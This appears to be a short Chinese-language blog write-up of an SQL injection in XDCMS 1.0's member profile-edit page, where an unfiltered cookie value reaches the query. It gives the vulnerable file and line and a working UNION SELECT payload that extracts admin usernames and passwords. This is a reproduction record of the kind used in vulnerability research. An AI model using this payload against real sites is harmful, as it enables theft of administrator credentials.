002-XDCMS 1.0 sql注入漏洞(二)

# XDCMS 1.0 sql注入漏洞(二)

### 一、漏洞简介

### 二、漏洞影响

XDCMS 1.0

### 三、复现过程

漏洞存在于用户资料修改页面,URL:`index.php?m=member&f=edit`

![](/static/lingzu/images/15896410551017.jpg)

漏洞文件位于system/modules/member/index.php,line:178

![](/static/lingzu/images/15896410633385.jpg)

$userid直接从Cookie中取出,并无任何过滤,导致注入

![](/static/lingzu/images/15896410693117.jpg)

“`sql
select * from table_member where ‘userid’=-4 Union seLect 1,2,username,4,5,6,7,8,9,10,11,12,password,14,15 fRom c_admin
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容